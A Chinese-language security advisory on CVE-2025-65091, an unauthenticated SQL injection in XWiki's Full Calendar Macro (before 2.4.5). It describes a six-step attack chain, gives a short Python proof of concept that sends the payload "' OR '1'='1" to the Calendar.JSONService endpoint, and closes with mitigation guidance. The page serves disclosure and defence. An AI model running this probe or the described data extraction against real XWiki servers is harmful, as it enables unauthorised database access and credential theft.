CVE-2025-65091: XWiki Full Calendar Macro SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-65091

漏洞类型

SQL注入

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

XWiki Full Calendar Macro

漏洞概述

CVE-2025-65091是XWiki Full Calendar Macro中的一个严重SQL注入漏洞，CVSS评分达到满分10.0。该漏洞存在于2.4.5之前的版本中，攻击者可以通过访问Calendar.JSONService页面注入恶意SQL语句。由于该页面允许包括访客用户在内的任何有查看权限的用户访问，且无需任何认证，因此漏洞利用门槛极低。成功利用此漏洞后，攻击者可以非法访问数据库中的敏感信息，包括用户凭据、配置文件等机密数据，甚至可以修改或删除数据库内容。更严重的是，攻击者还可以利用此漏洞发起拒绝服务(DoS)攻击，导致应用程序不可用。由于XWiki是广泛使用的企业级Wiki平台，该漏洞对所有使用受影响版本Full Calendar Macro插件的组织构成严重安全威胁。

技术细节

该SQL注入漏洞源于Full Calendar Macro扩展的Calendar.JSONService页面缺乏适当的输入验证。攻击者可以通过构造特殊的HTTP请求参数，在SQL查询中注入恶意SQL代码。由于Calendar.JSONService端点直接处理用户输入并将其用于数据库查询，攻击者可以操纵查询逻辑来提取任意数据或执行数据库操作。漏洞利用的关键点在于：1) 端点对所有具有查看权限的用户开放（包括匿名访客）；2) 缺少参数化查询或输入过滤机制；3) SQL错误信息可能被返回给攻击者，便于进行盲注或联合查询攻击。攻击者通常通过分析响应时间、错误信息或数据差异来推断注入是否成功，进而逐步提取数据库内容。修复版本2.4.5通过实施严格的输入验证和参数化查询来消除此漏洞。

攻击链分析

STEP 1

1

攻击者识别目标XWiki实例是否安装了Full Calendar Macro扩展

STEP 2

2

攻击者访问Calendar.JSONService页面，确认端点存在且可访问（包括匿名用户）

STEP 3

3

攻击者构造恶意SQL注入载荷，通过HTTP请求参数注入SQL代码

STEP 4

4

通过分析响应内容、错误信息或响应时间差异，攻击者逐步提取数据库中的敏感信息

STEP 5

5

攻击者获取管理员凭据或其他高价值数据，进一步控制整个XWiki系统

STEP 6

6

攻击者还可以利用注入漏洞执行资源密集型查询，导致数据库服务不可用（DoS攻击）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-65091 SQL Injection PoC for XWiki Full Calendar Macro
# Target: XWiki instance with Full Calendar Macro < 2.4.5

TARGET_URL = "http://target.com/xwiki/bin/view/Main/Calendar.JSONService"

def test_sql_injection():
    """Test for SQL injection vulnerability in Calendar.JSONService"""
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # Basic payload to test for SQL injection
    # Modify the 'query' parameter based on actual parameter name
    payload = {
        'query': "' OR '1'='1"
    }
    
    try:
        response = requests.post(TARGET_URL, data=payload, headers=headers, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        
        # Check for SQL error indicators
        if 'sql' in response.text.lower() or 'error' in response.text.lower():
            print("[!] Potential SQL injection detected - check response")
            print("Response preview:", response.text[:500])
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    print("CVE-2025-65091 SQL Injection Test")
    print("Target:", TARGET_URL)
    test_sql_injection()

影响范围

XWiki Full Calendar Macro < 2.4.5

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 禁用或限制Calendar.JSONService页面的访问权限，在XWiki权限配置中移除所有用户对该页面的查看权限；2) 通过Web服务器配置（如Nginx/Apache规则）对该端点的请求进行过滤和限制；3) 部署Web应用防火墙规则检测和阻止SQL注入特征；4) 监控数据库访问日志，查找异常的查询模式。建议尽快安排升级到修复版本2.4.5，因为临时缓解措施可能影响日历功能的正常使用。